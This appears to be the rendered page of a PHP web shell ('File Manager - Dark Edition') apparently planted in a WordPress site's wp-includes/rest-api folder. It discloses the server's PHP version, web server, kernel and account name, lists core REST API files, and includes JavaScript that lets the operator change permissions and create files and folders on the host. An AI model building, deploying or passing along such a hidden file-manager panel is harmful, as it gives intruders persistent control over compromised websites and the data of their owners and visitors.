PHP Polyglot Demo

File Manager - Dark Edition

πŸ“ File Manager - Dark Edition

PHP: 8.1.33 Server: LiteSpeed OS: Linux 5.14.0-570.60.1.el9_6.x86_64 User: u83854
Name Type Size Permissions Modified Actions
πŸ“ Parent Directory
πŸ“ Folders
πŸ“ endpoints Folder - rwxr-xr-x 2026-05-21 01:42
πŸ“ fields Folder - rwxr-xr-x 2026-07-06 05:28
πŸ“ search Folder - rwxr-xr-x 2026-01-12 10:37
πŸ“„ Files
πŸ“„ class-wp-rest-request.php PHP 25.9 KB rw-r--r-- 2026-01-12 18:46
πŸ“„ class-wp-rest-response.php PHP 7.2 KB rw-r--r-- 2026-01-12 18:46
πŸ“„ class-wp-rest-server.php PHP 56.4 KB rw-r--r-- 2026-05-21 01:42
// Chmod function function chmodItem(item) { var mode = prompt('Enter new permissions (e.g., 755):', '755'); if(mode) { var form = document.createElement('form'); form.method = 'post'; form.action = '?p=%2Fhome%2Fu83854%2Fpublic_html%2Fwp-includes%2Frest-api%2F'; form.innerHTML = '' + ''; document.body.appendChild(form); form.submit(); } } // Auto-hide notifications setTimeout(function() { var notifications = document.querySelectorAll('.notification'); notifications.forEach(function(n) { n.style.opacity = '0'; setTimeout(function() { n.style.display = 'none'; }, 300); }); }, 3000); // Keyboard shortcuts document.addEventListener('keydown', function(e) { if(e.ctrlKey && e.key === 'n') { e.preventDefault(); showNewFileModal(); } if(e.ctrlKey && e.shiftKey && e.key === 'N') { e.preventDefault(); showNewFolderModal(); } if(e.key === 'Escape') { document.querySelectorAll('.modal.active').forEach(function(m) { m.classList.remove('active'); }); } }); // Click outside modal to close document.querySelectorAll('.modal').forEach(function(modal) { modal.addEventListener('click', function(e) { if(e.target === modal) { modal.classList.remove('active'); } }); }); // Focus on input when modal opens document.addEventListener('DOMContentLoaded', function() { document.getElementById('newFileModal').addEventListener('click', function(e) { if(e.target === this) { var input = this.querySelector('input[name="newfile"]'); if(input) input.focus(); } }); document.getElementById('newFolderModal').addEventListener('click', function(e) { if(e.target === this) { var input = this.querySelector('input[name="newfolder"]'); if(input) input.focus(); } }); });